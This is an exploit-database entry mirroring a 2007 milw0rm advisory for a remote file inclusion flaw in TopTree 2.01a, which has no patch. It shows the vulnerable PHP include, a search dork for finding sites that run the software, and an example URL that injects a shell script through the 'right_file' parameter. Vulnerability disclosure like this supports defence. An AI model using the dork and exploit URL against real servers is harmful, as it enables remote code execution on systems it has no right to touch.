TopTree - exploit.company

vendor:

TopTree

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: TopTree

Affected Version From: 2.01a

Affected Version To: 2.01a

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

TopTree <= 2.01a Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file by manipulating the 'right_file' parameter in the 'tpl_message.php' file. This can lead to remote code execution.

Mitigation:

Upgrade to a patched version of TopTree.

Source

Exploit-DB raw data:

##############################################################################################
##############################################################################################
#TopTree <= 2.01a Remote File Inclusion Vulnerability
#
#Dork:"Powered by DVHome.cn"
#
#Vuln Code
###################################################################################
#
#ERROR:templates/default/tpl_message.php
#
# <?php include ($right_file); ?>
#
#BUG:
#
#Example:http://site.com/path/templates/default/tpl_message.php?right_file=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=169574&package_id=193438&release_id=426108
#
#Original W3b
Site############################################################################
#
#http://www.dvhome.cn
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]